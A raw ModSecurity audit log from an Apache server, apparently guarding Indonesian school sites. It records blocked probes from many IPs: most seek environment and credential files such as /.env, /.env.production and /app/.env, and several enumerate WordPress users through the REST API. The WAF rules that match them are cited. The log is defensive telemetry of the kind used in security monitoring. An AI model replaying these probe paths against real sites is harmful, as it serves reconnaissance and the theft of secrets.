Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5f0bca04-Z-- --18de3d6c-A-- [11/Jun/2025:12:18:59 +0700] aEkRw1Z8bXZTkbagOrDSGwAAAAw 103.236.140.4 44710 103.236.140.4 8181 --18de3d6c-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 193.233.85.69 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 193.233.85.69 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept: */* --18de3d6c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --18de3d6c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749619139435178 868 (- - -) Stopwatch2: 1749619139435178 868; combined=406, p1=366, p2=0, p3=0, p4=0, p5=39, sr=134, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --18de3d6c-Z-- --bdede034-A-- [11/Jun/2025:12:19:00 +0700] aEkRxGHSTY1pa5XXpU0rzAAAAEM 103.236.140.4 44738 103.236.140.4 8181 --bdede034-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 193.233.85.69 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 193.233.85.69 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept: */* --bdede034-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bdede034-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749619140915028 843 (- - -) Stopwatch2: 1749619140915028 843; combined=407, p1=372, p2=0, p3=0, p4=0, p5=35, sr=182, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bdede034-Z-- --08f1741a-A-- [11/Jun/2025:12:30:33 +0700] aEkUeZKj8lJYHQZ0EnfSYAAAAJg 103.236.140.4 58132 103.236.140.4 8181 --08f1741a-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 102.222.88.59 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 102.222.88.59 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --08f1741a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --08f1741a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749619833047245 3272 (- - -) Stopwatch2: 1749619833047245 3272; combined=1516, p1=512, p2=959, p3=0, p4=0, p5=45, sr=118, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --08f1741a-Z-- --f9f8672b-A-- [11/Jun/2025:13:29:47 +0700] aEkiW2HSTY1pa5XXpU0xeAAAAFE 103.236.140.4 38464 103.236.140.4 8181 --f9f8672b-B-- GET /config/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 207.180.223.50 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 207.180.223.50 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 8.0.0; moto e5 plus) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.89 Mobile Safari/537.36 Accept-Charset: utf-8 --f9f8672b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f9f8672b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749623387974944 886 (- - -) Stopwatch2: 1749623387974944 886; combined=356, p1=313, p2=0, p3=0, p4=0, p5=43, sr=101, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f9f8672b-Z-- --b994557c-A-- [11/Jun/2025:13:56:27 +0700] aEkom1Z8bXZTkbagOrDZ2QAAAAs 103.236.140.4 45510 103.236.140.4 8181 --b994557c-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 197.255.62.138 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 197.255.62.138 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --b994557c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b994557c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749624987254548 2516 (- - -) Stopwatch2: 1749624987254548 2516; combined=1184, p1=397, p2=759, p3=0, p4=0, p5=27, sr=115, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b994557c-Z-- --e0b6fc11-A-- [11/Jun/2025:13:57:20 +0700] aEko0FZ8bXZTkbagOrDZ2gAAAA4 103.236.140.4 45516 103.236.140.4 8181 --e0b6fc11-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 93.118.105.230 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 93.118.105.230 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --e0b6fc11-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e0b6fc11-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749625040095613 2953 (- - -) Stopwatch2: 1749625040095613 2953; combined=1330, p1=446, p2=853, p3=0, p4=0, p5=31, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e0b6fc11-Z-- --f7119a5c-A-- [11/Jun/2025:14:28:10 +0700] aEkwCpKj8lJYHQZ0EnfYMwAAAIM 103.236.140.4 58072 103.236.140.4 8181 --f7119a5c-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.84.199 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.84.199 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36 Accept-Charset: utf-8 --f7119a5c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f7119a5c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749626890256171 847 (- - -) Stopwatch2: 1749626890256171 847; combined=351, p1=310, p2=0, p3=0, p4=0, p5=41, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f7119a5c-Z-- --b5283229-A-- [11/Jun/2025:14:53:55 +0700] aEk2E2HSTY1pa5XXpU026wAAAEc 103.236.140.4 58314 103.236.140.4 8181 --b5283229-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 92.204.55.95 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 92.204.55.95 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --b5283229-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b5283229-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749628435834291 3013 (- - -) Stopwatch2: 1749628435834291 3013; combined=1243, p1=415, p2=801, p3=0, p4=0, p5=27, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b5283229-Z-- --018f9548-A-- [11/Jun/2025:14:56:22 +0700] aEk2plZ8bXZTkbagOrDclwAAAAU 103.236.140.4 58330 103.236.140.4 8181 --018f9548-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 109.94.119.128 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 109.94.119.128 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --018f9548-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --018f9548-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749628582881155 2974 (- - -) Stopwatch2: 1749628582881155 2974; combined=1271, p1=441, p2=800, p3=0, p4=0, p5=30, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --018f9548-Z-- --07c97072-A-- [11/Jun/2025:15:17:12 +0700] aEk7h1Z8bXZTkbagOrDcpwAAAAs 103.236.140.4 58490 103.236.140.4 8181 --07c97072-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 185.166.26.208 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.166.26.208 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --07c97072-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --07c97072-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749629831998410 3498 (- - -) Stopwatch2: 1749629831998410 3498; combined=1517, p1=525, p2=954, p3=0, p4=0, p5=38, sr=125, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --07c97072-Z-- --eb1b404b-A-- [11/Jun/2025:15:21:45 +0700] aEk8mRdyUEEur5MGa-VSxQAAAMs 103.236.140.4 59864 103.236.140.4 8181 --eb1b404b-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 138.219.108.237 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 138.219.108.237 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --eb1b404b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --eb1b404b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749630105973236 3356 (- - -) Stopwatch2: 1749630105973236 3356; combined=1448, p1=477, p2=938, p3=0, p4=0, p5=33, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --eb1b404b-Z-- --21b0c83b-A-- [11/Jun/2025:15:32:16 +0700] aEk_EJKj8lJYHQZ0EnfZIAAAAIk 103.236.140.4 59950 103.236.140.4 8181 --21b0c83b-B-- GET /.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 185.177.72.144 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 185.177.72.144 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --21b0c83b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --21b0c83b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749630736069294 694 (- - -) Stopwatch2: 1749630736069294 694; combined=255, p1=223, p2=0, p3=0, p4=0, p5=32, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --21b0c83b-Z-- --8a52246d-A-- [11/Jun/2025:15:32:16 +0700] aEk_EJKj8lJYHQZ0EnfZIQAAAIg 103.236.140.4 59952 103.236.140.4 8181 --8a52246d-B-- GET /.env.bak HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 185.177.72.144 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 185.177.72.144 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --8a52246d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8a52246d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749630736262141 686 (- - -) Stopwatch2: 1749630736262141 686; combined=267, p1=236, p2=0, p3=0, p4=0, p5=31, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8a52246d-Z-- --7f94a54e-A-- [11/Jun/2025:15:32:16 +0700] aEk_EJKj8lJYHQZ0EnfZIgAAAJg 103.236.140.4 59954 103.236.140.4 8181 --7f94a54e-B-- GET /.env.example HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 185.177.72.144 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 185.177.72.144 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --7f94a54e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7f94a54e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749630736472065 689 (- - -) Stopwatch2: 1749630736472065 689; combined=301, p1=269, p2=0, p3=0, p4=0, p5=31, sr=106, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7f94a54e-Z-- --53e4074a-A-- [11/Jun/2025:15:32:16 +0700] aEk_EJKj8lJYHQZ0EnfZIwAAAIA 103.236.140.4 59956 103.236.140.4 8181 --53e4074a-B-- GET /.env.local HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 185.177.72.144 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 185.177.72.144 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --53e4074a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --53e4074a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749630736732968 665 (- - -) Stopwatch2: 1749630736732968 665; combined=247, p1=215, p2=0, p3=0, p4=0, p5=32, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --53e4074a-Z-- --0364be18-A-- [11/Jun/2025:15:32:16 +0700] aEk_EJKj8lJYHQZ0EnfZJAAAAIs 103.236.140.4 59958 103.236.140.4 8181 --0364be18-B-- GET /.env.old HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 185.177.72.144 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 185.177.72.144 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --0364be18-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0364be18-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749630736920757 746 (- - -) Stopwatch2: 1749630736920757 746; combined=317, p1=286, p2=0, p3=0, p4=0, p5=31, sr=126, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0364be18-Z-- --30509002-A-- [11/Jun/2025:15:32:17 +0700] aEk_EZKj8lJYHQZ0EnfZJQAAAIc 103.236.140.4 59960 103.236.140.4 8181 --30509002-B-- GET /.env.production HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 185.177.72.144 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 185.177.72.144 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --30509002-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --30509002-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749630737099924 676 (- - -) Stopwatch2: 1749630737099924 676; combined=247, p1=215, p2=0, p3=0, p4=0, p5=32, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --30509002-Z-- --856dba18-A-- [11/Jun/2025:15:32:29 +0700] aEk_HZKj8lJYHQZ0EnfZKwAAAJM 103.236.140.4 59976 103.236.140.4 8181 --856dba18-B-- GET /app/.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 185.177.72.144 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 185.177.72.144 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --856dba18-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --856dba18-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749630749312496 663 (- - -) Stopwatch2: 1749630749312496 663; combined=250, p1=218, p2=0, p3=0, p4=0, p5=32, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
